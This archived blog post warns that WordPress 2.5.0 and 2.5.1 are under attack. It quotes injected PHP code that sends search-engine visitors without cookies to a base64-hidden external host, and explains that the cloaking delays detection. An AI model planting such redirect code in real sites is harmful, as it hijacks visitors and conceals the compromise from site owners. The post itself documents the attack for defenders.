You are viewing a read-only archive of the Blogs.Harvard network. Learn more.
Skip to content

WordPress 2.5.0 and 2.5.1 vulnerable to attack

Thanks to co-author Brandon Palmen for the heads up to a WordPress hack in progress. The attackers are using a few obfuscation tricks to inject code into WordPress installations using a recently announced vulnerability. More details in a well written write up here.

The code snippets from a forum are shown using base64 encoding to hide the true destination:


foreach($seref as $ref)

{ $ser="1"; break; }

if($ser=="1" && sizeof($_COOKIE)==0)
header("Location:http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/");

This code shows yet another trend we’ve noticed at of only exploiting those requests which come directly from a search engine. We can only conclude this is to prevent (or delay) detection and maximize infection duration.

Post a Comment

You must be logged in to post a comment.